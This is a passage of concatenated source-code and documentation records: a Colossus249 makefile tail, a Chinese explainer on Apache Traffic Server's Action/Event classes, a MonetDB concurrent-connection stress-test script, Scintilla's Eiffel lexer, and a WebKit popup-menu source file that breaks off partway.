9.)\n# Contact:\tRon Burkey .\n# Mod history:\t11/13/03 RSB.\tAdapted from Luminary131 makefile.\n#\t\t11/25/03 RSB.\tRemoved the '-' prefices in the\n#\t\t\t\tColossus249.bin target.\n#\t\t01/01/04 RSB\tFixed the path for Oct2Bin\n#\t\t05/06/04 RSB\tInstalls Colossus249.bin.\n#\t\t05/14/04 RSB\tAdded PREFIX\n#\t\t09/05/04 RSB\tNow runs yaYUL by default.\n#\t\t07/28/05 RSB\tNow account for symtabs.\n#\t\t2009-07-04 RSB\tAdded --html switch.\n#\t\t2011-05-03 JL\tReplaced with newer version from Artemis072.\n#\t\t\t\tPoint to moved Oct2Bin.\n#\t\t2012-09-16 JL\tUpdated to match tools dir changes.\n#\t\t2016-10-04 JL\tChange to use Makefile.inc.\n\nBASENAME=Colossus249\ninclude ../Makefile.inc\n"} {"text": "# 核心部件:Action & Event\n\n在介绍 Event 之前,首先了解一下 Action:\n\n当一个 状态机 通过某个 Processor方法 发起一个请求时,如果该请求将通过异步操作完成时,Processor 将返回一个指向 Action 对象的指针。\n- 通过一个指向 Action 对象的指针,状态机 可以取消正在进行中的异步操作。\n- 在取消之后,发起该操作的 状态机 将不会接收到来自该异步操作的回调。\n- 对于 Event System 中的 Processor 还有整个IO核心库公开的方法/函数来说,Action或其派生类 是一种常见的返回类型。\n- 只有 Action 将要回调的那个 状态机,才可以取消该 Action,而且在这之前要持有 状态机 的锁。\n\n## 定义/成员\n\nEvent 继承自 Action,首先看一下 Action 类\n\n```\nclass Action\n{\npublic:\n Continuation * continuation;\n Ptr mutex;\n // 防止编译器缓存该变量的值, 在 64bits 平台, 对该值的 读取 或 设置 是原子的\n volatile int cancelled;\n\n // 可由继承类重写, 实现继承类中对应的处理\n // 作为 Action 对外部提供的唯一接口\n virtual void cancel(Continuation * c = NULL) {\n if (!cancelled)\n cancelled = true;\n }\n\n // 此方法总是直接对 Action 基类设置取消操作, 跳过继承类的取消流程\n // 在 ATS 代码内, 此方法为 Event 对象专用\n void cancel_action(Continuation * c = NULL) {\n if (!cancelled)\n cancelled = true;\n }\n\n // 重载赋值(=)操作\n // 用于初始化 Action\n // acont 为操作完成时回调的状态机\n // mutex 为上述状态机的锁, 采用 Ptr<> 自动指针管理\n Continuation *operator =(Continuation * acont)\n {\n continuation = acont;\n if (acont)\n mutex = acont->mutex;\n else\n mutex = 0;\n return acont;\n }\n\n // 构造函数\n // 初始化continuation为NULL,cancelled为false\n Action():continuation(NULL), cancelled(false) {\n }\n\n virtual ~ Action() {\n }\n};\n```\n\n## Processor 方法实现者:\n\n在实现一个 Processor 的方法时, 必须确保:\n\n- 在操作被取消之后,不会有事件发送给状态机。\n\n## 返回一个 Action:\n\nProcessor 
方法通常是异步执行的,因此必须返回Action,这样状态机才能在任务完成前随时取消该任务。\n\n- 一个“**任务状态机**”将会被创建出来,用于完成该异步任务,\n- 在该“**任务状态机**”内包含一个 Action 对象的实例,Processor 返回的是指向该 Action 实例的指针,\n- 此时, 发起调用的状态机总是先获得 Action指针,\n- 然后才会收到该异步任务以回调的方式,传递的结果,\n- 在收到回调之前, 随时可以通过 Action指针 取消该任务。\n\n由于某些 Processor 的方法是可以同步执行的(可重入的),因此可能会出现:\n\n- 首先通过回调的方式,向发起调用的状态机传递了结果,\n- 然后,再向将 Action 返回给发起调用的状态机。\n\n此时返回 Action 是毫无意义的, 为了处理这种情况,返回特殊的几个值来代替 Action 对象,以指示状态机该动作已经完成。\n\n- ACTION\\_RESULT\\_DONE\n - 该 Processor 已经完成了任务,并内嵌(同步)回调了状态机\n- ACTION\\_RESULT\\_INLINE\n - 当前未使用\n- ACTION\\_RESULT\\_IO\\_ERROR\n - 当前未使用\n\n也许会出现这样一种更复杂的问题:\n\n- 当结果为 ACTION\\_RESULT\\_DONE\n- 同时,状态机在同步回调中释放了自身\n \n因此,状态机的实现者必须:\n\n- 同步回调时, 不要释放自身(不容易判断出回调的类型是同步还是异步)\n\n或者,\n\n- 立即检查 Processor 方法返回的 Action\n- 如果该值为 ACTION\\_RESULT\\_DONE,那么就不能对状态机的任何状态变量进行读或写。\n\n无论使用哪种方式,都要对返回值进行检查(是否为 ACTION\\_RESULT\\_DONE),同时进行相应的处理。\n\n\n## 回调状态机\n\nAction 的成员\n\n- continuation 指向了将要回调的状态机\n- mutex 指向了该状态机的锁\n- cancelled 表明该 Action 是否已经被取消\n\n为了在状态机释放自身后,仍然可以合法访问 mutex 对象,将 mutex 声明为 Ptr\\ 类型,以避免 mutex 随状态机的销毁而同时被释放。\n\n回调状态机的步骤如下:\n\n1. 首先要尝试对 Action::mutex 上锁,只有上锁成功,才可以访问 Action 的成员变量\n - 前面介绍过,只有 Action 将要回调的那个状态机才可以取消 Action,也就是将 Action::cancelled 设置为 true\n - 这是因为 mutex 指向了状态机的锁,共享同一把锁的状态机是互斥的,因此可以安全访问 Action::cancelled\n - 因此,凡是共享同一把锁的状态机都是可以取消该 Action 的\n - 如果上锁失败,就要通过 Event System 重新尝试上锁\n2. 上锁成功后,需要判断 Action::cancelled 为 false\n - 当 cancelled 为 true 时,表示状态机已经取消了该 Action\n - 此时,状态机可能已经销毁,因此 continuation 已经不再指向一个合法的状态机\n - 该“**任务状态机**”应该停止继续执行,接下来应该销毁自身并回收资源\n3. 最后通过 continuation 回调状态机,使用约定的 event 将 data 传递给状态机\n - 应当确保在任何回调发生时,目标状态机被当前线程上锁\n\n\n## 分配/释放策略:\n\nAction 的分配和释放遵循以下策略:\n\n- Action 由执行它的 Processor 进行分配。\n - 通常 Processor 方法会创建一个“**任务状态机**”来异步执行某个特定任务\n - 而 Action 对象则是该“**任务状态机**”的一个成员对象\n- 当 Action 完成或者被取消后,Processor 有责任和义务来释放它。\n - 当“**任务状态机**”需要回调 状态机 时,\n - 通过 Action 获得 mutex 并对其上锁\n - 然后检查 Action 的成员 cancelled\n - 如已经 cancelled, 则销毁“**任务状态机**”\n - 否则回调 Action.continuation,以传递结果\n- 当返回的 Action 已经完成,或者状态机对一个 Action 执行了取消操作,\n - 状态机就不可以再访问该 Action。\n\n\n## 参考资料\n\n[I_Action.h](http://github.com/apache/trafficserver/tree/master/iocore/eventsystem/I_Action.h)\n\n\n# 核心部件:Event\n\nEvent类 继承自 Action类, 它是 EventProcessor 返回的专用 Action 类型,它作为调度操作的结果由 EventProcessor 返回。\n\n不同于 Action 的异步操作,Event 是不可重入的。\n\n - EventProcessor 总是返回 Event 对象给状态机,\n - 然后, 状态机才会收到回调。\n - 不会像 Action类 的返回者, 可能存在同步回调 状态机 的情形。\n\n除了能够取消事件(因为它是一个动作),你也可以在收到它的回调之后重新对它进行调度。\n\n## 定义/成员\n\n```\nclass Event : public Action \n{ \npublic: \n // 设置事件(Event)类型的方法\n void schedule_imm(int callback_event = EVENT_IMMEDIATE); \n void schedule_at(ink_hrtime atimeout_at, int callback_event = EVENT_INTERVAL); \n void schedule_in(ink_hrtime atimeout_in, int callback_event = EVENT_INTERVAL); \n void schedule_every(ink_hrtime aperiod, int callback_event = EVENT_INTERVAL);\n\n // Inherited from Action:\n // Continuation * continuation;\n // Ptr mutex;\n // volatile int cancelled;\n // virtual void cancel(Continuation * c = NULL); \n\n // 处理此Event的ethread指针,在ethread处理此Event之前填充(就是在schedule时)。\n // 当一个 Event 由一个 EThread 管理后, 就无法在转交给其它 EThread 管理。\n EThread *ethread;\n\n // 状态及标志位\n unsigned int in_the_prot_queue:1; \n unsigned int in_the_priority_queue:1; \n unsigned int immediate:1; \n unsigned int globally_allocated:1; \n unsigned int in_heap:4; \n\n // 向Cont->handler传递的事件(Event)类型\n int callback_event;\n\n // 组合构成四种事件(Event)类型\n ink_hrtime timeout_at; \n ink_hrtime period;\n\n // 在回调Cont->handler时作为数据(Data)传递\n void *cookie;\n\n // 构造函数\n Event();\n\n // 初始化一个Event\n Event *init(Continuation * c, ink_hrtime atimeout_at 
= 0, ink_hrtime aperiod = 0);\n // 释放Event\n void free();\n\nprivate:\n // use the fast allocators\n void *operator new(size_t size);\n\n // prevent unauthorized copies (Not implemented)\n Event(const Event &); \n Event & operator =(const Event &);\npublic: \n LINK(Event, link);\n\n virtual ~Event() {}\n};\n\nTS_INLINE Event *\nEvent::init(Continuation *c, ink_hrtime atimeout_at, ink_hrtime aperiod)\n{\n continuation = c;\n timeout_at = atimeout_at;\n period = aperiod;\n immediate = !period && !atimeout_at;\n cancelled = false;\n return this;\n}\n\nTS_INLINE void\nEvent::free()\n{\n mutex = NULL;\n eventAllocator.free(this);\n}\n\nTS_INLINE\nEvent::Event()\n : ethread(0), in_the_prot_queue(false), in_the_priority_queue(false), \n immediate(false), globally_allocated(true), in_heap(false),\n timeout_at(0), period(0)\n{\n}\n\n// Event 的内存分配不对空间进行 bzero() 操作, 因此在 Event::init() 方法中会初始化所有必要的值\n#define EVENT_ALLOC(_a, _t) THREAD_ALLOC(_a, _t)\n#define EVENT_FREE(_p, _a, _t) \\\n _p->mutex = NULL; \\\n if (_p->globally_allocated) \\\n ::_a.free(_p); \\\n else \\\n THREAD_FREE(_p, _a, _t)\n```\n\n## Event 方法\n\nEvent::init()\n\n- 初始化一个 Event\n- 通常用来准备一个 Event,然后选择一个新的 EThread 线程来处理这个事件时使用\n- 接下来通常会调用 EThread::schedule() 方法\n\nEvent::schedule\\_\\*()\n\n- 如果事件(Event)已经存在于 EThread 的```内部队列```,则先从队列中删除\n- 然后直接向 EThread 的```本地队列```添加事件(Event)\n- 因此此方法只能向当前 EThread 事件池添加事件(Event),不能跨线程添加\n\n对于 Event::schedule\\_\\*() 的使用,在源代码中有相关注释,翻译如下:\n\n- 当通过任何 Event类 的调度函数重新调度一个事件时,状态机(SM)不可以在除了回调它的线程以外的线程中调用这些调度函数(好绕,其实就是状态机必须在回调它的线程里调用重新调度的函数),而且必须在调用之前获得该 延续(Continuation) 的锁。\n- Event 是与线程绑定的,一个 Event 诞生后,只可以在一个线程内重新调度\n- 如果希望把 延续(Continuation) 重新调度到另外一个线程,可以通过 EThread::schedule\\_\\*() 方法,或者 EventProcessor::schedule\\_\\*() 方法 实现\n\n## 事件(Event)的类型\n\nATS 中的事件(Event),被设计为以下四种类型:\n\n- 立即执行\n - timeout\\_at=0,period=0\n - 通过 schedule\\_imm 设置 callback\\_event=EVENT\\_IMMEDIATE\n - 或通过 schedule\\_imm\\_signal\n- 绝对定时执行\n - timeout\\_at>0,period=0\n - 通过 schedule\\_at 设置 callback\\_event=EVENT\\_INTERVAL,可以理解为在xx时刻执行\n- 相对定时执行\n - timeout\\_at>0,period=0\n - 通过 schedule\\_in 设置 callback\\_event=EVENT\\_INTERVAL,可以理解为在xx时间之内执行\n- 定期/周期执行\n - timeout\\_at=period>0\n - 通过 schedule\\_every 设置 callback_event=EVENT\\_INTERVAL,可以理解为每隔一定时间重复执行\n\n另外针对隐性队列,还有特殊的第五种类型:\n\n- 随时执行\n - timeout_at=period<0\n - 通过 schedule\\_every 设置 callback\\_event=EVENT\\_INTERVAL\n - 调用 Cont->handler 时会固定传送 EVENT_POLL 事件类型\n - 对于 TCP连接,此种类型的事件(Event)由 NetHandler::startNetEvent 添加\n - Cont->handler 对于TCP事件为 NetHandler::mainNetEvent()\n\n### Time values:\n\n任务调度函数使用了一个类型为 ink\\_hrtime 用来指定超时或周期的时间参数。这是由 libts 支持的纳秒值,你应该使用在 ink\\_hrtime.h 中定义的时间函数和宏。\n\n超时参数对于 schedule\\_at和schedule\\_in 之间的差别在于:\n\n- 在前者,它是绝对时间,未来的某个预定的时刻\n- 在后者,它是相对于当前时间(通过ink\\_get\\_hrtime得到)的一个量\n\n\n### 取消Event的规则\n\n与下面这些对于Action的规则是一样的\n\n- Event 的取消者必须是该任务将要回调的状态机,同时在取消的过程中需要持有状态机的锁\n- 任何在该状态机持有的对于该Event对象(例如:指针)的引用,在取消操作之后都不得继续使用\n\n\n### Event Codes:\n\n- 在事件完成后,状态机SM使用延续处理函数(Cont->handleEvent)传递进来的 Event Codes 来区分 Event类型 和处理相应的数据参数。\n- 定义 Event Code 时,状态机的实现者应该小心处理,因为它们对其它状态机产生影响。\n- 由于这个原因,Event Code 通常统一进行分配。\n\n通常在调用 Cont->handleEvent 时传递的 Event Code 有如下几种:\n\n```\n#define EVENT_NONE CONTINUATION_EVENT_NONE // 0\n#define EVENT_IMMEDIATE 1\n#define EVENT_INTERVAL 2\n#define EVENT_ERROR 3\n#define EVENT_CALL 4 // used internally in state machines\n#define EVENT_POLL 5 // negative event; activated on poll or epoll\n```\n\n通常 Cont->handleEvent 也会返回一个 Event Callback Code\n\n```\n#define EVENT_DONE CONTINUATION_DONE // 0\n#define EVENT_CONT CONTINUATION_CONT // 
## References\n\n- [I_Event.h](http://github.com/apache/trafficserver/tree/master/iocore/eventsystem/I_Event.h)\n- [P_UnixEvent.h](http://github.com/apache/trafficserver/tree/master/iocore/eventsystem/P_UnixEvent.h)\n- [UnixEvent.cc](http://github.com/apache/trafficserver/tree/master/iocore/eventsystem/UnixEvent.cc)\n\n"} {"text": "#!/usr/bin/env bash\n\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n#\n# Copyright 1997 - July 2008 CWI, August 2008 - 2020 MonetDB B.V.\n\n# Run mclient with a variable number of concurrent connections for\n# simple SELECT 1; queries. Disconnect after each query. Continue as\n# long as the server can cope.\n# This script intends to simulate a scenario as reported in bug #2700\n\ndo_usage() {\n\techo \"usage: concurrent_stress.sh concurrency [database [host [port]]]\" \n\texit 1\n}\n\n[[ -z $1 ]] && do_usage\n\nCONCURRENCY=$1\nshift\nfor v in MDATABASE:d MHOST:h MPORT:p ; do\n\t[[ -z $1 ]] && break\n\teval ${v%:*}=\"-${v#*:}$1\"\n\tshift\ndone\n\nif ! 
type -P mclient > /dev/null ; then\n\techo \"cannot find mclient in PATH!\" > /dev/stderr\n\texit 1\nfi\n\necho \"invoking $CONCURRENCY runners using the command:\"\necho \" mclient $MDATABASE $MHOST $MPORT -ftab -s \\\"SELECT 1;\\\"\"\n\nconcurrent_runner() {\n\tlocal num=$1\n\tlocal cnt=1\n\tlocal now=$SECONDS\n\tlocal lcnt=0\n\tlocal elapse=\n\tlocal t=\n\twhile mclient $MDATABASE $MHOST $MPORT -ftab -s \"SELECT 1;\" > /dev/null ; do\n\t\t: $((cnt++))\n\t\telapse=$((SECONDS - now))\n\t\tif [[ ${elapse} -ge 3 ]] ; then\n\t\t\tt=$((cnt - lcnt))\n\t\t\tt=$((t * 100))\n\t\t\tt=$((t / elapse))\n\t\t\techo \"mclient $num executed query $cnt, current speed: ${t%??}.${t#${t%??}}q/s\"\n\t\t\tlcnt=${cnt}\n\t\t\tnow=$SECONDS\n\t\tfi\n\tdone\n\techo \"mclient $num terminated in query $cnt\"\n}\n\nFORKS=\nfor nr in $(seq 1 $CONCURRENCY) ; do\n\tconcurrent_runner $nr &\n\tFORKS+=\" $!\"\ndone\n\ncleanup() {\n\tkill $FORKS\n}\ntrap cleanup TERM INT QUIT\n\n# wait for all children to end\nwait $FORKS\n"} {"text": "// Scintilla source code edit control\r\n/** @file LexEiffel.cxx\r\n ** Lexer for Eiffel.\r\n **/\r\n// Copyright 1998-2001 by Neil Hodgson \r\n// The License.txt file describes the conditions under which this software may be distributed.\r\n\r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n\r\n#include \"ILexer.h\"\r\n#include \"Scintilla.h\"\r\n#include \"SciLexer.h\"\r\n\r\n#include \"WordList.h\"\r\n#include \"LexAccessor.h\"\r\n#include \"Accessor.h\"\r\n#include \"StyleContext.h\"\r\n#include \"CharacterSet.h\"\r\n#include \"LexerModule.h\"\r\n\r\nusing namespace Scintilla;\r\n\r\nstatic inline bool isEiffelOperator(unsigned int ch) {\r\n\t// '.' left out as it is used to make up numbers\r\n\treturn ch == '*' || ch == '/' || ch == '\\\\' || ch == '-' || ch == '+' ||\r\n\t ch == '(' || ch == ')' || ch == '=' ||\r\n\t ch == '{' || ch == '}' || ch == '~' ||\r\n\t ch == '[' || ch == ']' || ch == ';' ||\r\n\t ch == '<' || ch == '>' || ch == ',' ||\r\n\t ch == '.' || ch == '^' || ch == '%' || ch == ':' ||\r\n\t\tch == '!' 
|| ch == '@' || ch == '?';\r\n}\r\n\r\nstatic inline bool IsAWordChar(unsigned int ch) {\r\n\treturn (ch < 0x80) && (isalnum(ch) || ch == '_');\r\n}\r\n\r\nstatic inline bool IsAWordStart(unsigned int ch) {\r\n\treturn (ch < 0x80) && (isalnum(ch) || ch == '_');\r\n}\r\n\r\nstatic void ColouriseEiffelDoc(Sci_PositionU startPos,\r\n Sci_Position length,\r\n int initStyle,\r\n WordList *keywordlists[],\r\n Accessor &styler) {\r\n\r\n\tWordList &keywords = *keywordlists[0];\r\n\r\n\tStyleContext sc(startPos, length, initStyle, styler);\r\n\r\n\tfor (; sc.More(); sc.Forward()) {\r\n\r\n\t\tif (sc.state == SCE_EIFFEL_STRINGEOL) {\r\n\t\t\tif (sc.ch != '\\r' && sc.ch != '\\n') {\r\n\t\t\t\tsc.SetState(SCE_EIFFEL_DEFAULT);\r\n\t\t\t}\r\n\t\t} else if (sc.state == SCE_EIFFEL_OPERATOR) {\r\n\t\t\tsc.SetState(SCE_EIFFEL_DEFAULT);\r\n\t\t} else if (sc.state == SCE_EIFFEL_WORD) {\r\n\t\t\tif (!IsAWordChar(sc.ch)) {\r\n\t\t\t\tchar s[100];\r\n\t\t\t\tsc.GetCurrentLowered(s, sizeof(s));\r\n\t\t\t\tif (!keywords.InList(s)) {\r\n\t\t\t\t\tsc.ChangeState(SCE_EIFFEL_IDENTIFIER);\r\n\t\t\t\t}\r\n\t\t\t\tsc.SetState(SCE_EIFFEL_DEFAULT);\r\n\t\t\t}\r\n\t\t} else if (sc.state == SCE_EIFFEL_NUMBER) {\r\n\t\t\tif (!IsAWordChar(sc.ch)) {\r\n\t\t\t\tsc.SetState(SCE_EIFFEL_DEFAULT);\r\n\t\t\t}\r\n\t\t} else if (sc.state == SCE_EIFFEL_COMMENTLINE) {\r\n\t\t\tif (sc.ch == '\\r' || sc.ch == '\\n') {\r\n\t\t\t\tsc.SetState(SCE_EIFFEL_DEFAULT);\r\n\t\t\t}\r\n\t\t} else if (sc.state == SCE_EIFFEL_STRING) {\r\n\t\t\tif (sc.ch == '%') {\r\n\t\t\t\tsc.Forward();\r\n\t\t\t} else if (sc.ch == '\\\"') {\r\n\t\t\t\tsc.Forward();\r\n\t\t\t\tsc.SetState(SCE_EIFFEL_DEFAULT);\r\n\t\t\t}\r\n\t\t} else if (sc.state == SCE_EIFFEL_CHARACTER) {\r\n\t\t\tif (sc.ch == '\\r' || sc.ch == '\\n') {\r\n\t\t\t\tsc.SetState(SCE_EIFFEL_STRINGEOL);\r\n\t\t\t} else if (sc.ch == '%') {\r\n\t\t\t\tsc.Forward();\r\n\t\t\t} else if (sc.ch == '\\'') {\r\n\t\t\t\tsc.Forward();\r\n\t\t\t\tsc.SetState(SCE_EIFFEL_DEFAULT);\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tif (sc.state == SCE_EIFFEL_DEFAULT) {\r\n\t\t\tif (sc.ch == '-' && sc.chNext == '-') {\r\n\t\t\t\tsc.SetState(SCE_EIFFEL_COMMENTLINE);\r\n\t\t\t} else if (sc.ch == '\\\"') {\r\n\t\t\t\tsc.SetState(SCE_EIFFEL_STRING);\r\n\t\t\t} else if (sc.ch == '\\'') {\r\n\t\t\t\tsc.SetState(SCE_EIFFEL_CHARACTER);\r\n\t\t\t} else if (IsADigit(sc.ch) || (sc.ch == '.')) {\r\n\t\t\t\tsc.SetState(SCE_EIFFEL_NUMBER);\r\n\t\t\t} else if (IsAWordStart(sc.ch)) {\r\n\t\t\t\tsc.SetState(SCE_EIFFEL_WORD);\r\n\t\t\t} else if (isEiffelOperator(sc.ch)) {\r\n\t\t\t\tsc.SetState(SCE_EIFFEL_OPERATOR);\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tsc.Complete();\r\n}\r\n\r\nstatic bool IsEiffelComment(Accessor &styler, Sci_Position pos, Sci_Position len) {\r\n\treturn len>1 && styler[pos]=='-' && styler[pos+1]=='-';\r\n}\r\n\r\nstatic void FoldEiffelDocIndent(Sci_PositionU startPos, Sci_Position length, int,\r\n\t\t\t\t\t\t WordList *[], Accessor &styler) {\r\n\tSci_Position lengthDoc = startPos + length;\r\n\r\n\t// Backtrack to previous line in case need to fix its fold status\r\n\tSci_Position lineCurrent = styler.GetLine(startPos);\r\n\tif (startPos > 0) {\r\n\t\tif (lineCurrent > 0) {\r\n\t\t\tlineCurrent--;\r\n\t\t\tstartPos = styler.LineStart(lineCurrent);\r\n\t\t}\r\n\t}\r\n\tint spaceFlags = 0;\r\n\tint indentCurrent = styler.IndentAmount(lineCurrent, &spaceFlags, IsEiffelComment);\r\n\tchar chNext = styler[startPos];\r\n\tfor (Sci_Position i = startPos; i < lengthDoc; i++) {\r\n\t\tchar ch = chNext;\r\n\t\tchNext = styler.SafeGetCharAt(i + 
1);\r\n\r\n\t\tif ((ch == '\\r' && chNext != '\\n') || (ch == '\\n') || (i == lengthDoc)) {\r\n\t\t\tint lev = indentCurrent;\r\n\t\t\tint indentNext = styler.IndentAmount(lineCurrent + 1, &spaceFlags, IsEiffelComment);\r\n\t\t\tif (!(indentCurrent & SC_FOLDLEVELWHITEFLAG)) {\r\n\t\t\t\t// Only non whitespace lines can be headers\r\n\t\t\t\tif ((indentCurrent & SC_FOLDLEVELNUMBERMASK) < (indentNext & SC_FOLDLEVELNUMBERMASK)) {\r\n\t\t\t\t\tlev |= SC_FOLDLEVELHEADERFLAG;\r\n\t\t\t\t} else if (indentNext & SC_FOLDLEVELWHITEFLAG) {\r\n\t\t\t\t\t// Line after is blank so check the next - maybe should continue further?\r\n\t\t\t\t\tint spaceFlags2 = 0;\r\n\t\t\t\t\tint indentNext2 = styler.IndentAmount(lineCurrent + 2, &spaceFlags2, IsEiffelComment);\r\n\t\t\t\t\tif ((indentCurrent & SC_FOLDLEVELNUMBERMASK) < (indentNext2 & SC_FOLDLEVELNUMBERMASK)) {\r\n\t\t\t\t\t\tlev |= SC_FOLDLEVELHEADERFLAG;\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\tindentCurrent = indentNext;\r\n\t\t\tstyler.SetLevel(lineCurrent, lev);\r\n\t\t\tlineCurrent++;\r\n\t\t}\r\n\t}\r\n}\r\n\r\nstatic void FoldEiffelDocKeyWords(Sci_PositionU startPos, Sci_Position length, int /* initStyle */, WordList *[],\r\n Accessor &styler) {\r\n\tSci_PositionU lengthDoc = startPos + length;\r\n\tint visibleChars = 0;\r\n\tSci_Position lineCurrent = styler.GetLine(startPos);\r\n\tint levelPrev = styler.LevelAt(lineCurrent) & SC_FOLDLEVELNUMBERMASK;\r\n\tint levelCurrent = levelPrev;\r\n\tchar chNext = styler[startPos];\r\n\tint stylePrev = 0;\r\n\tint styleNext = styler.StyleAt(startPos);\r\n\t// lastDeferred should be determined by looking back to last keyword in case\r\n\t// the \"deferred\" is on a line before \"class\"\r\n\tbool lastDeferred = false;\r\n\tfor (Sci_PositionU i = startPos; i < lengthDoc; i++) {\r\n\t\tchar ch = chNext;\r\n\t\tchNext = styler.SafeGetCharAt(i + 1);\r\n\t\tint style = styleNext;\r\n\t\tstyleNext = styler.StyleAt(i + 1);\r\n\t\tbool atEOL = (ch == '\\r' && chNext != '\\n') || (ch == '\\n');\r\n\t\tif ((stylePrev != SCE_EIFFEL_WORD) && (style == SCE_EIFFEL_WORD)) {\r\n\t\t\tchar s[20];\r\n\t\t\tSci_PositionU j = 0;\r\n\t\t\twhile ((j < (sizeof(s) - 1)) && (iswordchar(styler[i + j]))) {\r\n\t\t\t\ts[j] = styler[i + j];\r\n\t\t\t\tj++;\r\n\t\t\t}\r\n\t\t\ts[j] = '\\0';\r\n\r\n\t\t\tif (\r\n\t\t\t\t(strcmp(s, \"check\") == 0) ||\r\n\t\t\t\t(strcmp(s, \"debug\") == 0) ||\r\n\t\t\t\t(strcmp(s, \"deferred\") == 0) ||\r\n\t\t\t\t(strcmp(s, \"do\") == 0) ||\r\n\t\t\t\t(strcmp(s, \"from\") == 0) ||\r\n\t\t\t\t(strcmp(s, \"if\") == 0) ||\r\n\t\t\t\t(strcmp(s, \"inspect\") == 0) ||\r\n\t\t\t\t(strcmp(s, \"once\") == 0)\r\n\t\t\t)\r\n\t\t\t\tlevelCurrent++;\r\n\t\t\tif (!lastDeferred && (strcmp(s, \"class\") == 0))\r\n\t\t\t\tlevelCurrent++;\r\n\t\t\tif (strcmp(s, \"end\") == 0)\r\n\t\t\t\tlevelCurrent--;\r\n\t\t\tlastDeferred = strcmp(s, \"deferred\") == 0;\r\n\t\t}\r\n\r\n\t\tif (atEOL) {\r\n\t\t\tint lev = levelPrev;\r\n\t\t\tif (visibleChars == 0)\r\n\t\t\t\tlev |= SC_FOLDLEVELWHITEFLAG;\r\n\t\t\tif ((levelCurrent > levelPrev) && (visibleChars > 0))\r\n\t\t\t\tlev |= SC_FOLDLEVELHEADERFLAG;\r\n\t\t\tif (lev != styler.LevelAt(lineCurrent)) {\r\n\t\t\t\tstyler.SetLevel(lineCurrent, lev);\r\n\t\t\t}\r\n\t\t\tlineCurrent++;\r\n\t\t\tlevelPrev = levelCurrent;\r\n\t\t\tvisibleChars = 0;\r\n\t\t}\r\n\t\tif (!isspacechar(ch))\r\n\t\t\tvisibleChars++;\r\n\t\tstylePrev = style;\r\n\t}\r\n\t// Fill in the real level of the next line, keeping the current flags as they will be filled in later\r\n\tint flagsNext = 
styler.LevelAt(lineCurrent) & ~SC_FOLDLEVELNUMBERMASK;\r\n\tstyler.SetLevel(lineCurrent, levelPrev | flagsNext);\r\n}\r\n\r\nstatic const char * const eiffelWordListDesc[] = {\r\n\t\"Keywords\",\r\n\t0\r\n};\r\n\r\nLexerModule lmEiffel(SCLEX_EIFFEL, ColouriseEiffelDoc, \"eiffel\", FoldEiffelDocIndent, eiffelWordListDesc);\r\nLexerModule lmEiffelkw(SCLEX_EIFFELKW, ColouriseEiffelDoc, \"eiffelkw\", FoldEiffelDocKeyWords, eiffelWordListDesc);\r\n"} {"text": "/*\n * Copyright (C) 2010 Nokia Corporation and/or its subsidiary(-ies).\n * Copyright (C) 2010 Apple Inc. All rights reserved.\n *\n * This library is free software; you can redistribute it and/or\n * modify it under the terms of the GNU Library General Public\n * License as published by the Free Software Foundation; either\n * version 2 of the License, or (at your option) any later version.\n *\n * This library is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n * Library General Public License for more details.\n *\n * You should have received a copy of the GNU Library General Public License\n * along with this library; see the file COPYING.LIB. If not, write to\n * the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,\n * Boston, MA 02110-1301, USA.\n *\n */\n\n#include \"config.h\"\n#include \"WebPopupMenu.h\"\n\n#include \"PlatformPopupMenuData.h\"\n#include \"WebCoreArgumentCoders.h\"\n#include \"WebPage.h\"\n#include \"WebPageProxyMessages.h\"\n#include \"WebProcess.h\"\n#include \n#include \n\nusing namespace WebCore;\n\nnamespace WebKit {\n\nRef WebPopupMenu::create(WebPage* page, PopupMenuClient* client)\n{\n return adoptRef(*new WebPopupMenu(page, client));\n}\n\nWebPopupMenu::WebPopupMenu(WebPage* page, PopupMenuClient* client)\n : m_popupClient(client)\n , m_page(page)\n{\n}\n\nWebPopupMenu::~WebPopupMenu()\n{\n}\n\nvoid WebPopupMenu::disconnectClient()\n{\n m_popupClient = 0;\n}\n\nvoid WebPopupMenu::didChangeSelectedIndex(int newIndex)\n{\n if (!m_popupClient)\n return;\n\n m_popupClient->popupDidHide();\n if (newIndex >= 0)\n m_popupClient->valueChanged(newIndex);\n}\n\nvoid WebPopupMenu::setTextForIndex(int index)\n{\n if (!m_popupClient)\n return;\n\n m_popupClient->setTextFromItem(index);\n}\n\nVector WebPopupMenu::populateItems()\n{\n size_t size = m_popupClient->listSize();\n\n Vector items;\n items.reserveInitialCapacity(size);\n \n for (size_t i = 0; i < size; ++i) {\n if (m_popupClient->itemIsSeparator(i))\n items.append(WebPopupItem(WebPopupItem::Separator));\n else {\n // FIXME: Add support for styling the font.\n // FIXME: Add support for styling the foreground and background colors.\n // FIXME: Find a way to customize text color when an item is highlighted.\n PopupMenuStyle itemStyle = m_popupClient->itemStyle(i);\n items.append(WebPopupItem(WebPopupItem::Item, m_popupClient->itemText(i), itemStyle.textDirection(), itemStyle.hasTextDirectionOverride(), m_popupClient->itemToolTip(i), m_popupClient->itemAccessibilityText(i), m_popupClient->itemIsEnabled(i), m_popupClient->itemIsLabel(i), m_popupClient->itemIsSelected(i)));\n }\n }\n\n return items;\n}\n\nvoid WebPopupMenu::show(const IntRect& rect, FrameView* view, int index)\n{\n // FIXME: We should probably inform the client to also close the menu.\n Vector items = populateItems();\n\n if (items.isEmpty() || !m_page) {\n m_popupClient->popupDidHide();\n return;\n }\n\n m_page->setActivePopupMenu(this);\n\n // 
